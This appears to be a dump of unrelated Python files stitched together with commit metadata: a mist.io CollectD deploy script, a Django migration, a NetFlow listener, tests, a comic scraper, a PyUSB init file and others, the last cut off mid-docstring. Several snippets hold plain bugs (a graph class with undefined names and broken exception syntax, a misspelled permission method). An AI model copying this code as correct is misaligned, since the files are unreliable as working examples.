def main():
    """Deploy CollectD on localhost for monitoring with mist.io"""
    parser = argparse.ArgumentParser(
        description="Deploy mist.io CollectD on localhost.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument("uuid", help="Machine uuid assigned by mist.io.")
    parser.add_argument("password",
                        help="Machine password assigned by mist.io, "
                             "used to sign/encrypt CollectD data.")
    parser.add_argument("-m", "--monitor-server", default="monitor1.mist.io",
                        help="Remote CollectD server to send data to.")
    parser.add_argument(
        "--no-check-certificate", action='store_true',
        help="Don't verify SSL certificates when "
             "get_urling dependencies from HTTPS."
    )
    args = parser.parse_args()

    python = sys.executable

    # check if deploy_collectd repo is locally available
    playbook_path = ""
    if __file__ != '<stdin>':
        self_dir = os.path.dirname(os.path.realpath(__file__))
        playbook_path = os.path.join(self_dir, PLAYBOOK_PATH)
        if not os.path.exists(playbook_path):
            playbook_path = ""

    # NOTE(review): os.mkdir fails if TMP_DIR already exists (e.g. rerun).
    print "*** Will work in '%s' ***" % TMP_DIR
    os.mkdir(TMP_DIR)
    os.chdir(TMP_DIR)

    # Pick a downloader: prefer wget, fall back to curl.
    if not shellcmd("command -v wget", False, False):
        # use wget
        get_url = "wget"
        if args.no_check_certificate:
            get_url += " --no-check-certificate"
    elif not shellcmd("command -v curl", False, False):
        # use curl
        get_url = "curl -L -O"
        if args.no_check_certificate:
            get_url += " -k"
    else:
        sys.exit("ERROR: Neither 'curl' nor 'wget' found, exiting.")

    # Bootstrap a virtualenv to install ansible into, without touching the
    # system Python.
    print "*** Fetching virtualenv tarball ***"
    url = "%s/v/virtualenv/virtualenv-%s.tar.gz" % (PYPI_URL, VENV_VERSION)
    shellcmd("%s %s" % (get_url, url))
    print "*** Extracting virtualenv tarball ***"
    shellcmd("tar -xzf virtualenv-%s.tar.gz" % VENV_VERSION)
    print "*** Creating virtualenv ***"
    shellcmd("%s virtualenv-%s/virtualenv.py env" % (python, VENV_VERSION))
    print "*** Installing virtualenv in virtualenv :) ***"
    shellcmd("env/bin/pip install virtualenv-%s.tar.gz" % VENV_VERSION)

    print "*** Fetching ansible tarball ***"
    url = "%s/a/ansible/ansible-%s.tar.gz" % (PYPI_URL, ANSIBLE_VERSION)
    shellcmd("%s %s" % (get_url, url))
    print "*** Extracting ansible tarball ***"
    shellcmd("tar -xzf ansible-%s.tar.gz" % ANSIBLE_VERSION)
    # Strip compiled dependencies (pycrypto/paramiko) from ansible's setup.py
    # so installation needs no compiler; local connections don't use them.
    print "*** Removing pycrypto from ansible requirements ***"
    shellcmd("sed -i \"s/, 'pycrypto[^']*'//\" ansible-%s/setup.py"
             % ANSIBLE_VERSION)
    print "*** Removing paramiko from ansible requirements ***"
    shellcmd("sed -i \"s/'paramiko[^']*', //\" ansible-%s/setup.py"
             % ANSIBLE_VERSION)
    print "*** Installing ansible in virtualenv ***"
    shellcmd("env/bin/pip install ansible-%s/" % ANSIBLE_VERSION)

    print "*** Generate ansible inventory file for localhost ***"
    with open("inventory", "w") as fobj:
        fobj.write("localhost ansible_connection=local "
                   "ansible_python_interpreter=%s\n" % python)
    print "*** Generate ansible.cfg ***"
    with open("ansible.cfg", "w") as fobj:
        fobj.write("[defaults]\n"
                   "hostfile = inventory\n"
                   "nocows = 1\n")

    if playbook_path:
        print "*** CollectD deployment playbook is locally available ***"
    else:
        print "*** Fetching mistio/deploy_collectd repo tarball ***"
        url = "https://github.com/mistio/deploy_collectd/archive/master.tar.gz"
        shellcmd("%s %s" % (get_url, url))
        print "*** Extracting mistio/deploy_collectd tarball ***"
        shellcmd("tar -xzf master.tar.gz")
        playbook_path = "deploy_collectd-master/%s" % PLAYBOOK_PATH

    print "*** Running CollectD deployment playbook against localhost ***"
    shellcmd("env/bin/ansible-playbook %s -e 'uuid=%s password=%s monitor=%s'"
             % (playbook_path, args.uuid, args.password, args.monitor_server))
    print "*** CollectD deployment playbook completed successfully ***"


if __name__ == "__main__":
    main()
| Python | 0 | |
d14af37197c35fa72c13746f4aef8bf296014382 | 添加数据库迁移 设置name为unique | experiment/migrations/0003_auto__add_unique_lessoncategory_name.py | experiment/migrations/0003_auto__add_unique_lessoncategory_name.py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: add the unique constraint on LessonCategory.name."""
        # Adding unique constraint on 'LessonCategory', fields ['name']
        db.create_unique(u'experiment_lessoncategory', ['name'])
def backwards(self, orm):
# Removing unique constraint on 'LessonCategory', fields ['name']
db.delete_unique(u'experiment_lessoncategory', ['name'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'experiment.experiment': {
'Meta': {'object_name': 'Experiment'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'create_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deadline': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lesson': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['experiment.Lesson']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'remark': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
u'experiment.lesson': {
'Meta': {'object_name': 'Lesson'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['experiment.LessonCategory']"}),
'create_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'status': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'students': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.User']", 'symmetrical': 'False'}),
'teacher': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['teacher.Teacher']"})
},
u'experiment.lessoncategory': {
'Meta': {'object_name': 'LessonCategory'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '60'})
},
u'teacher.teacher': {
'Meta': {'object_name': 'Teacher'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
}
}
complete_apps = ['experiment'] | Python | 0 | |
459f87be465e0f5554c708fe60679494d152c8fd | Create permissions.py | templates/root/main/permissions.py | templates/root/main/permissions.py | from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permissions(self, request, view, obj):
# Read permissions are allowed to any request,
# so we'll always allow GET, HEAD, or OPTIONS requests.
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet.
return obj.owner == request.user
| Python | 0.000001 | |
4a98686b63563b209456a8933ef34477adcdae43 | extend Phabricator class and do nothing | phabricate/phab.py | phabricate/phab.py | from phabricator import Phabricator as _Phabricator
class Phabricator(_Phabricator):
pass
| Python | 0 | |
99e2ad1c812d98bb5c952780b78097ef56fdccdc | add netflow listener | utils/netflow.py | utils/netflow.py | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# Copyright (c) 2014 Mozilla Corporation
#
# Contributors:
# Anthony Verez averez@mozilla.com
import socket, struct, sys
from socket import inet_ntoa
SIZE_OF_HEADER = 24
SIZE_OF_RECORD = 48
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if len(sys.argv) == 4:
sock.bind((sys.argv[1], int(sys.argv[2])))
else:
print "Usage: python ./netflow.py <listening_addr> <listening_udp_port> <log_file>"
sys.exit(1)
# doc: http://www.plixer.com/support/netflow_v5.html
f = file(sys.argv[3], 'a')
fields = [
'version', # 0
'count', # 1
'sys_uptime', # 2
'unix_secs', # 3
'unix_nsecs', # 4
'flow_sequence', # 5
'engine_type', # 6
'engine_id', # 7
'sampling_interval', # 8
'srcaddr', # 9
'dstaddr', # 10
'nexthop', # 11
'dPkts', # 12
'dOctets', # 13
'first', # 14
'last', # 15
'srcport', # 16
'dstport', # 17
'tcp_flags', # 18
'prot', # 19
'tos', # 20
'src_as', # 21
'dst_as', # 22
'src_mask', # 23
'dst_mask', # 24
]
for h in fields:
f.write("%s\t" % h)
f.write("\n")
while True:
buf, addr = sock.recvfrom(1500)
header = {}
# NetFlow export format version number
# Number of flows exported in this packet (1-30)
(header['version'], header['count']) = struct.unpack('!HH',buf[0:4])
if header['version'] != 5:
print "Not NetFlow v5!"
continue
# It's pretty unlikely you'll ever see more then 1000 records in a 1500 byte UDP packet
if header['count'] <= 0 or header['count'] >= 1000:
print "Invalid count %s" % header['count']
continue
# Current time in milliseconds since the export device booted
header['sys_uptime'] = socket.ntohl(struct.unpack('I', buf[4:8])[0])
# Current count of seconds since 0000 UTC 1970
header['unix_secs'] = socket.ntohl(struct.unpack('I', buf[8:12])[0])
# Residual nanoseconds since 0000 UTC 1970
header['unix_nsecs'] = socket.ntohl(struct.unpack('I', buf[12:16])[0])
# Sequence counter of total flows seen
header['flow_sequence'] = socket.ntohl(struct.unpack('I', buf[16:20])[0])
# Type of flow-switching engine
header['engine_type'] = socket.ntohl(struct.unpack('B', buf[20])[0])
# Slot number of the flow-switching engine
header['engine_id'] = socket.ntohl(struct.unpack('B', buf[21])[0])
# First two bits hold the sampling mode; remaining 14 bits hold value of sampling interval
header['sampling_interval'] = struct.unpack('!H', buf[22:24])[0] & 0b0011111111111111
#print header
for i in range(0, header['count']):
try:
base = SIZE_OF_HEADER+(i*SIZE_OF_RECORD)
data = struct.unpack('!IIIIHH',buf[base+16:base+36])
data2 = struct.unpack('!BBBHHBB',buf[base+37:base+46])
record = header
# Source IP address
record['srcaddr'] = inet_ntoa(buf[base+0:base+4])
# Destination IP address
record['dstaddr'] = inet_ntoa(buf[base+4:base+8])
# IP address of next hop router
record['nexthop'] = inet_ntoa(buf[base+8:base+12])
# Packets in the flow
record['dPkts'] = data[0]
# Total number of Layer 3 bytes in the packets of the flow
record['dOctets'] = data[1]
# SysUptime at start of flow
record['first'] = data[2]
# SysUptime at the time the last packet of the flow was received
record['last'] = data[3]
# TCP/UDP source port number or equivalent
record['srcport'] = data[4]
# TCP/UDP destination port number or equivalent
record['dstport'] = data[5]
# Cumulative OR of TCP flags
record['tcp_flags'] = data2[0]
# IP protocol type (for example, TCP = 6; UDP = 17)
record['prot'] = data2[1]
# IP type of service (ToS)
record['tos'] = data2[2]
# Autonomous system number of the source, either origin or peer
record['src_as'] = data2[3]
# Autonomous system number of the destination, either origin or peer
record['dst_as'] = data2[4]
# Source address prefix mask bits
record['src_mask'] = data2[5]
# Destination address prefix mask bits
record['dst_mask'] = data2[6]
for h in fields:
f.write("%s\t" % record[h])
f.write("\n")
#print record
except:
continue
# Do something with the netflow record..
#print "%s:%s -> %s:%s" % (record['srcaddr'],record['srcport'],record['dstaddr'],record['dstport'])
f.close()
| Python | 0.000001 | |
cca6b0c28747a3b0307fccd33dee60fcb42d910d | Test Fix. | tests/components/garage_door/test_demo.py | tests/components/garage_door/test_demo.py | """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, RIGHT))
| """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, RIGHT))
| Python | 0 |
67d0d381003dc02d5e1eae9d0c8591daee4b93b3 | Migrate SnafuComics to single-class module. | dosagelib/plugins/snafu.py | dosagelib/plugins/snafu.py | # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name, path):
super(Snafu, self).__init__('SnafuComics/' + name)
self.url = 'http://snafu-comics.com/swmseries/' + path
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@classmethod
def getmodules(cls):
return [
cls('Braindead', 'braindead'),
cls('Bunnywith', 'bunnywith'),
cls('DeliverUsEvil', 'deliverusevil'),
cls('EA', 'ea'),
cls('FT', 'ft'),
cls('GrimTalesFromDownBelow', 'grimtales'),
cls('KOF', 'kof'),
cls('MyPanda', 'mypanda'),
cls('NarutoHeroesPath', 'naruto'),
cls('NewSuperMarioAdventures', 'nsma'),
cls('PowerPuffGirls', 'powerpuffgirls'),
# cls('PSG2', 'psg2'), -- Strangely broken
cls('SatansExcrement', 'satansexcrement'),
cls('SF', 'sf'),
cls('SkullBoy', 'skullboy'),
cls('Snafu', 'snafu'),
cls('Soul', 'soul'),
cls('Sugar', 'sugarbits'),
cls('SureToBeBanD', 'stbb'),
cls('TheLeague', 'league'),
cls('Tin', 'tin'),
cls('Titan', 'titan'),
cls('TrunksAndSoto', 'trunks-and-soto'),
cls('TW', 'tw'),
cls('Zim', 'zim'),
]
| # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class _Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name):
super(_Snafu, self).__init__('SnafuComics/' + name)
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@property
def url(self):
return 'http://snafu-comics.com/swmseries/' + self.path
class Braindead(_Snafu):
path = 'braindead'
class Bunnywith(_Snafu):
path = 'bunnywith'
class DeliverUsEvil(_Snafu):
path = 'deliverusevil'
class DigitalPurgatory(_Snafu):
path = 'digital-purgatory'
class EA(_Snafu):
path = 'ea'
class FT(_Snafu):
path = 'ft'
class GrimTalesFromDownBelow(_Snafu):
path = 'grimtales'
class KOF(_Snafu):
path = 'kof'
class MyPanda(_Snafu):
path = 'mypanda'
class NarutoHeroesPath(_Snafu):
path = 'naruto'
class NewSuperMarioAdventures(_Snafu):
path = 'nsma'
class PowerPuffGirls(_Snafu):
path = 'powerpuffgirls'
class PSG2(_Snafu):
path = 'psg2'
class SatansExcrement(_Snafu):
path = 'satansexcrement'
class SF(_Snafu):
path = 'sf'
class SkullBoy(_Snafu):
path = 'skullboy'
class Snafu(_Snafu):
path = 'snafu'
class Soul(_Snafu):
path = 'soul'
class Sugar(_Snafu):
path = 'sugarbits'
class SureToBeBanD(_Snafu):
path = 'stbb'
class TheLeague(_Snafu):
path = 'league'
class Tin(_Snafu):
path = 'tin'
class Titan(_Snafu):
path = 'titan'
class TrunksAndSoto(_Snafu):
path = 'trunks-and-soto'
class TW(_Snafu):
path = 'tw'
class Zim(_Snafu):
path = 'zim'
| Python | 0 |
43cf23e793794fd45322471a52c83785070ac243 | add simple_graph | simple_graph.py | simple_graph.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
class Graph(object):
def __init__(self):
self.gdict = {}
def nodes(self):
return self.gdict.keys()
def edges(self):
self.edges = []
for node in self.gdict:
for end in self.gdict[node]:
self.edges.append((node, end))
return self.edges
def add_node(self, n):
self.gdict.setdefault(n, [])
def add_edge(self, n1, n2):
self.gdict[n1].setdefault(n2, [])
try:
self.gdict[n1].append(n2)
except KeyError:
self.gdict[n1] = [n2]
def del_node(self, n):
try:
del self.gdict[n1]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
for nodelist in self.gdit.values():
try:
nodelist.remove(n)
except ValueError:
continue
def del_edge(self, n1, n2):
try:
self.gdict[n1].remove[n2]
except KeyError, ValueError:
raise ValueError('Edge {}, {} not in the graph.'.format(n1, n2))
def has_node(self, n):
return n in self.gdict
def neighbors(self, n):
try:
return self.gdict[n]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
def adjacent(self, n1, n2):
if n1 not in self.dict or n2 not in self.gdict:
raise KeyError('One of these nodes is not in the graph.')
return n2 in self.gdict[n1]
| Python | 0.999579 | |
d7e6291564a5d5683a8b03fc9a761ad3e3dd70ea | Bump version to stable. | usb/__init__.py | usb/__init__.py | # Copyright (C) 2009-2014 Wander Lairson Costa
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""PyUSB - Easy USB access in Python
This package exports the following modules and subpackages:
core - the main USB implementation
legacy - the compatibility layer with 0.x version
backend - the support for backend implementations.
control - USB standard control requests.
libloader - helper module for backend library loading.
Since version 1.0, main PyUSB implementation lives in the 'usb.core'
module. New applications are encouraged to use it.
"""
import logging
import os
__author__ = 'Wander Lairson Costa'
# Use Semantic Versioning, http://semver.org/
version_info = (1, 0, 0)
__version__ = '%d.%d.%d' % version_info
__all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
def _setup_log():
from usb import _debug
logger = logging.getLogger('usb')
debug_level = os.getenv('PYUSB_DEBUG')
if debug_level is not None:
_debug.enable_tracing(True)
filename = os.getenv('PYUSB_LOG_FILENAME')
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
level = LEVELS.get(debug_level, logging.CRITICAL + 10)
logger.setLevel(level = level)
try:
handler = logging.FileHandler(filename)
except:
handler = logging.StreamHandler()
fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
handler.setFormatter(fmt)
logger.addHandler(handler)
else:
class NullHandler(logging.Handler):
def emit(self, record):
pass
# We set the log level to avoid delegation to the
# parent log handler (if there is one).
# Thanks to Chris Clark to pointing this out.
logger.setLevel(logging.CRITICAL + 10)
logger.addHandler(NullHandler())
_setup_log()
# We import all 'legacy' module symbols to provide compatibility
# with applications that use 0.x versions.
from usb.legacy import *
| # Copyright (C) 2009-2014 Wander Lairson Costa
#
# The following terms apply to all files associated
# with the software unless explicitly disclaimed in individual files.
#
# The authors hereby grant permission to use, copy, modify, distribute,
# and license this software and its documentation for any purpose, provided
# that existing copyright notices are retained in all copies and that this
# notice is included verbatim in any distributions. No written agreement,
# license, or royalty fee is required for any of the authorized uses.
# Modifications to this software may be copyrighted by their authors
# and need not follow the licensing terms described here, provided that
# the new terms are clearly indicated on the first page of each file where
# they apply.
#
# IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
# FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
# ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
# DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
# IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
# NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
# MODIFICATIONS.
r"""PyUSB - Easy USB access in Python
This package exports the following modules and subpackages:
core - the main USB implementation
legacy - the compatibility layer with 0.x version
backend - the support for backend implementations.
control - USB standard control requests.
libloader - helper module for backend library loading.
Since version 1.0, main PyUSB implementation lives in the 'usb.core'
module. New applications are encouraged to use it.
"""
import logging
import os
__author__ = 'Wander Lairson Costa'
# Use Semantic Versioning, http://semver.org/
version_info = (1, 0, 0, 'rc1')
__version__ = '%d.%d.%d%s' % version_info
__all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
def _setup_log():
from usb import _debug
logger = logging.getLogger('usb')
debug_level = os.getenv('PYUSB_DEBUG')
if debug_level is not None:
_debug.enable_tracing(True)
filename = os.getenv('PYUSB_LOG_FILENAME')
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
level = LEVELS.get(debug_level, logging.CRITICAL + 10)
logger.setLevel(level = level)
try:
handler = logging.FileHandler(filename)
except:
handler = logging.StreamHandler()
fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
handler.setFormatter(fmt)
logger.addHandler(handler)
else:
class NullHandler(logging.Handler):
def emit(self, record):
pass
# We set the log level to avoid delegation to the
# parent log handler (if there is one).
# Thanks to Chris Clark to pointing this out.
logger.setLevel(logging.CRITICAL + 10)
logger.addHandler(NullHandler())
_setup_log()
# We import all 'legacy' module symbols to provide compatibility
# with applications that use 0.x versions.
from usb.legacy import *
| Python | 0 |
7d9b004b3fb33ed9f16ca657ddb6ee3ddf452802 | add dump2pe (t2_08 sample) | elfesteem/t2_08_dump2pe.py | elfesteem/t2_08_dump2pe.py | #! /usr/bin/env python
import pe
from pe_init import PE
import rlcompleter,readline,pdb, sys
from pprint import pprint as pp
readline.parse_and_bind("tab: complete")
import shlex
f = open('my_dump.txt', 'r')
for i in xrange(27):
f.readline()
state = 0
funcs = []
dll = ""
#parse imprec output
new_dll = []
while True:
l = f.readline()
if not l:
break
l = l.strip()
if state == 0 and l.startswith("FThunk"):
t = [r for r in shlex.shlex(l)]
ad = int(t[2], 16)
state = 1
continue
if state == 1:
t = [r for r in shlex.shlex(l)]
if not len(t):
new_dll.append(({"name":dll,
"firstthunk":ad},funcs[:] ))
dll = ""
funcs, state = [], 0
else:
dll = t[2]
funcs.append(t[6])
continue
pp(new_dll)
data = open('DUMP_00401000-00479000', 'rb').read()
e = PE()
e.DirImport.add_dlldesc(new_dll)
s_text = e.SHList.add_section(name = "text", addr = 0x1000, data = data)
s_myimp = e.SHList.add_section(name = "myimp", rawsize = len(e.DirImport))
e.DirImport.set_rva(s_myimp.addr)
e.Opthdr.Opthdr.AddressOfEntryPoint = s_text.addr
open('uu.bin', 'wb').write(str(e))
| Python | 0 | |
0881e326a604977bcaf385db152a96826db52b74 | Add class for publishing a service on avahi | wizd/publish.py | wizd/publish.py | import dbus
import gobject
import avahi
import threading
import sys
from dbus.mainloop.glib import DBusGMainLoop
"""
Class for publishing a service on DNS-SD using Avahi.
Creates a thread to handle requests
